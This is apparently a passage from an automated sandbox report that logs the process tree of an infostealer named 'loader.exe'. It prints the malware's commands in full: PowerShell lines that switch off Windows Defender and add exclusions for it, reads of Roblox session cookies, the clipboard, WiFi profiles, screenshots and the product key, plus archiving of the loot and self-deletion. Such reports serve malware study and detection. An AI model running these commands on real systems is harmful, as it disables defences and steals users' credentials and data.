AAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
5⤵
- Command and Scripting Interpreter: PowerShell
PID:5724

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cxzssqyv\cxzssqyv.cmdline"
6⤵
PID:4308

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2DA9.tmp" "c:\Users\Admin\AppData\Local\Temp\cxzssqyv\CSCDA77ACFC6B0E43D4A66C278BC8C5FB45.TMP"
7⤵
PID:3652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:6108

C:\Windows\SysWOW64\tree.com
tree /A /F
5⤵
PID:5320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
4⤵
PID:5172

C:\Windows\SysWOW64\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
5⤵
- Views/modifies file attributes
PID:2644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:5180

C:\Windows\SysWOW64\tree.com
tree /A /F
5⤵
PID:2252

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:2788

C:\Windows\SysWOW64\tree.com
tree /A /F
5⤵
PID:5972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
4⤵
PID:5800

C:\Windows\SysWOW64\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
5⤵
- Views/modifies file attributes
PID:5540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:2612

C:\Windows\SysWOW64\tree.com
tree /A /F
5⤵
PID:6132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:6088

C:\Windows\SysWOW64\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:2196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:5768

C:\Windows\SysWOW64\tree.com
tree /A /F
5⤵
PID:5776

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3052"
4⤵
PID:5932

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 3052
5⤵
- Kills process with taskkill
PID:4228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3052"
4⤵
PID:5596

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 3052
5⤵
- Kills process with taskkill
PID:4672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3492"
4⤵
PID:4332

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 3492
5⤵
- Kills process with taskkill
PID:5192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3492"
4⤵
PID:5660

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 3492
5⤵
- Kills process with taskkill
PID:5692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5088"
4⤵
PID:5360

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 5088
5⤵
- Kills process with taskkill
PID:5796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5088"
4⤵
PID:2644

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:2300

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 5088
5⤵
- Kills process with taskkill
PID:5916

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1956"
4⤵
PID:5988

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 1956
5⤵
- Kills process with taskkill
PID:5816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1956"
4⤵
PID:6004

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 1956
5⤵
- Kills process with taskkill
PID:5944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1528"
4⤵
PID:6072

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 1528
5⤵
- Kills process with taskkill
PID:5136

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1528"
4⤵
PID:6100

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 1528
5⤵
- Kills process with taskkill
PID:5652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4076"
4⤵
PID:2948

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 4076
5⤵
- Kills process with taskkill
PID:5552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4076"
4⤵
PID:5884

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 4076
5⤵
- Kills process with taskkill
PID:3140

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3880"
4⤵
PID:3168

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 3880
5⤵
- Kills process with taskkill
PID:3876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3880"
4⤵
PID:4928

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 3880
5⤵
- Kills process with taskkill
PID:3920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 456"
4⤵
PID:60

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:2496

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 456
5⤵
- Kills process with taskkill
PID:5232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 456"
4⤵
PID:4596

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 456
5⤵
- Kills process with taskkill
PID:972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
4⤵
PID:3016

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:1052

C:\Windows\SysWOW64\getmac.exe
getmac
5⤵
PID:5684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5064"
4⤵
PID:5760

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 5064
5⤵
- Kills process with taskkill
PID:2304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5064"
4⤵
PID:6048

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 5064
5⤵
- Kills process with taskkill
PID:1344

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4312"
4⤵
PID:5932

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 4312
5⤵
- Kills process with taskkill
PID:1736

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4312"
4⤵
PID:4204

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 4312
5⤵
- Kills process with taskkill
PID:1652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
4⤵
PID:5608

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:5692

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
5⤵
PID:5284

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
4⤵
PID:5384

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
5⤵
PID:3384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI11762\rar.exe a -r -hp"jayora" "C:\Users\Admin\AppData\Local\Temp\KIzzZ.zip" *"
4⤵
PID:1540

C:\Users\Admin\AppData\Local\Temp\_MEI11762\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI11762\rar.exe a -r -hp"jayora" "C:\Users\Admin\AppData\Local\Temp\KIzzZ.zip" *
5⤵
- Executes dropped EXE
PID:4400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
4⤵
PID:5272

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic os get Caption
5⤵
PID:5076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
4⤵
PID:5500

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
5⤵
PID:2592

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
4⤵
PID:5236

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic csproduct get uuid
5⤵
PID:1548

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
4⤵
PID:3468

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
5⤵
PID:2352

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
4⤵
PID:5896

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:5684

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
5⤵
- Detects videocard installed
PID:1112

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
4⤵
PID:6128

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
5⤵
PID:5832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Downloads\loader.exe""
4⤵
PID:3544

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 3
5⤵
- Runs ping.exe
PID:2612

C:\Users\Admin\Downloads\loader.exe
"C:\Users\Admin\Downloads\loader.exe"
2⤵
- Executes dropped EXE
PID:2740

C:\Users\Admin\Downloads\loader.exe
"C:\Users\Admin\Downloads\loader.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5068

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4424

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1952

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:2788

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:3204

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd9bf0ab58,0x7ffd9bf0ab68,0x7ffd9bf0ab78
2⤵
PID:5580

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1676 --field-trial-handle=1924,i,14160806183136393007,11566382872136643653,131072 /prefetch:2
2⤵
PID:3140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1820 --field-trial-handle=1924,i,14160806183136393007,11566382872136643653,131072 /prefetch:8
2⤵
PID:1284

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1928 --field-trial-handle=1924,i,14160806183136393007,11566382872136643653,131072 /prefetch:8
2⤵
PID:2972

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3036 --field-trial-handle=1924,i,14160806183136393007,11566382872136643653,131072 /prefetch:1
2⤵
PID:5648

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3068 --field-trial-handle=1924,i,14160806183136393007,11566382872136643653,131072 /prefetch:1
2⤵
PID:5132

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4384 --field-trial-handle=1924,i,14160806183136393007,11566382872136643653,131072 /prefetch:1
2⤵
PID:5324

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4156 --field-trial-handle=1924,i,14160806183136393007,11566382872136643653,131072 /prefetch:1
2⤵
PID:5020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4796 --field-trial-handle=1924,i,14160806183136393007,11566382872136643653,131072 /prefetch:8
2⤵
PID:4156

C:\Users\Admin\Downloads\loader.exe
"C:\Users\Admin\Downloads\loader.exe"
2⤵
- Executes dropped EXE
PID:5160

C:\Users\Admin\Downloads\loader.exe
"C:\Users\Admin\Downloads\loader.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4468

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5016 --field-trial-handle=1924,i,14160806183136393007,11566382872136643653,131072 /prefetch:8
2⤵
PID:3620

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3260 --field-trial-handle=1924,i,14160806183136393007,11566382872136643653,131072 /prefetch:8
2⤵
PID:4560

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5116 --field-trial-handle=1924,i,14160806183136393007,11566382872136643653,131072 /prefetch:8
2⤵
PID:2264

C:\Users\Admin\Downloads\loader.exe
"C:\Users\Admin\Downloads\loader.exe"
2⤵
- Executes dropped EXE
PID:2140

C:\Users\Admin\Downloads\loader.exe
"C:\Users\Admin\Downloads\loader.exe"
3⤵
- Executes dropped EXE
PID:5724

C:\Users\Admin\Downloads\loader.exe
"C:\Users\Admin\Downloads\loader.exe"
2⤵
- Executes dropped EXE
PID:5216

C:\Users\Admin\Downloads\loader.exe
"C:\Users\Admin\Downloads\loader.exe"
3⤵
- Executes dropped EXE
PID:2360

C:\Users\Admin\Downloads\loader.exe
"C:\Users\Admin\Downloads\loader.exe"
2⤵
PID:3496

C:\Users\Admin\Downloads\loader.exe
"C:\Users\Admin\Downloads\loader.exe"
3⤵
PID:5148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\loader.exe'"
4⤵
PID:5748

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\loader.exe'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:2220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
4⤵
PID:1452

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
5⤵
PID:2072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:4908

C:\Windows\SysWOW64\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:6084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
4⤵
PID:1720

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic csproduct get uuid
5⤵
PID:4464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
4⤵
PID:4168

C:\Windows\SysWOW64\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
5⤵
PID:2600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
4⤵
PID:5060

C:\Windows\SysWOW64\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
5⤵
PID:5596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
4⤵
PID:5420

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
5⤵
- Detects videocard installed
PID:4600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
4⤵
PID:3572

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
5⤵
- Detects videocard installed
PID:5160

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Downloads\loader.exe""
4⤵
- Hide Artifacts: Hidden Files and Directories
PID:916

C:\Windows\SysWOW64\attrib.exe
attrib +h +s "C:\Users\Admin\Downloads\loader.exe"
5⤵
- Views/modifies file attributes
PID:1040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‌.scr'"
4⤵
PID:3936

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‌.scr'
5⤵
- Command and Scripting Interpreter: PowerShell
PID:1952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:1548

C:\Windows\SysWOW64\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:4668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:1224

C:\Windows\SysWOW64\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:5704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
4⤵
PID:5128

C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
5⤵
PID:2216

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
4⤵
PID:4572

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:2688

C:\Windows\SysWOW64\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:5040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:972

C:\Windows\SysWOW64\tree.com
tree /A /F
5⤵
PID:5420

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
4⤵
PID:6080

C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
5⤵
PID:5816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
4⤵
PID:3836

C:\Windows\SysWOW64\systeminfo.exe
systeminfo
5⤵
- Gathers system information
PID:1200

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
4⤵
PID:5280

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:5216

C:\Windows\SysWOW64\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
5⤵
PID:5260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZAB